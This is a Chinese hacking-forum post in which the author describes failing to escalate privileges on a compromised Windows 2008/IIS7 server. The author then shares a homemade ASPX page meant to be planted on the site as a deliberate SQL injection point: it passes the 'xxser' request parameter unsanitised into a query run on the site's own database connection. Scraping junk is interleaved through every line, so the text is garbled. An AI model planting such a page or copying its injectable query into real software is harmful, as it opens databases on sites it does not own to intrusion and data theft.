昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
, d$ g P4 |4 {$ U8 |# Q( n其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。+ L) k# X2 q) B( J+ H$ h: i n4 s
代码量不多,自己写个拉倒了。烦死了。
9 I% B$ _( Y( F3 C( x, ?$ [( |5 m! u! c I% Z" i: b- y
: y1 ? Q9 a6 B) d |+ ?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">4 X9 Z7 b! _% s9 l
<html xmlns="http://www.w3.org/1999/xhtml">
1 R2 v, J+ E( j/ l<head runat="server">
5 ~; J7 B9 k5 P8 S$ y! k) t4 e <title>暗影aspx构造注射专用页面</title>' S( Q, m) }& I
</head>
9 V$ ?* o- r7 b4 ]: k: v<body>
: Q+ M6 y- m! }4 d: Y <form id="form1" runat="server">
; o0 \ {& o& O# X- s+ K' j2 a <div>( ^: O: S7 u+ m$ J. s1 f. X
<script language="c#" runat="server">: U9 L) ]9 Y& P4 Y) \7 _
) w+ }5 j$ J: ]8 Q
void page_init(object sender, EventArgs e)
4 ^( D, W2 P! {+ Q' y8 s {# @# O" x3 H+ u
, I9 S, \$ V* ^6 Z7 r: H System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(); ^2 {/ q+ Q n _
6 X2 T: v; B( k+ w+ H2 g
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();/ o, s2 r5 N7 m: p8 l( Y
conn.Open();
9 d! v7 N" B5 A" d
+ @2 o7 v) e$ X+ o: b5 d string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
& b, v. S; r$ F2 G8 y' z8 Y
2 N" D1 R9 G; Z9 i* ~ System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);. i0 w* [1 a4 S
int x = command.ExecuteNonQuery();
" Y$ O" I3 A0 `2 g9 x% h, F Response.Write(i+"\n");
, s4 D9 @# P) i3 e2 @. A! a7 V Response.Write(x);' B5 d& y' @' C: a9 L! Q1 `0 k
conn.Close();- \ m1 [: N4 A$ Q1 H* e
}
( L* v( x% r: j9 ?+ q 9 C6 i& W5 l% G6 u# V! T: D
</script>3 B2 N/ P. n5 S: G8 \: ]
</div>9 h: N x% o( G N2 T
</form>9 Z; }; d: \5 [1 p
</body>( B+ k* J, O& y3 y( z" I( i4 Y
</html>7 j3 M; ^4 K ^# d( y
|